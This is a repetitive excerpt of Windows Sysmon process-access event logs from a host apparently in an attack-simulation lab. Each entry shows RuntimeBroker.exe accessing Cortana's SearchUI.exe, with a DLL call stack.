13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 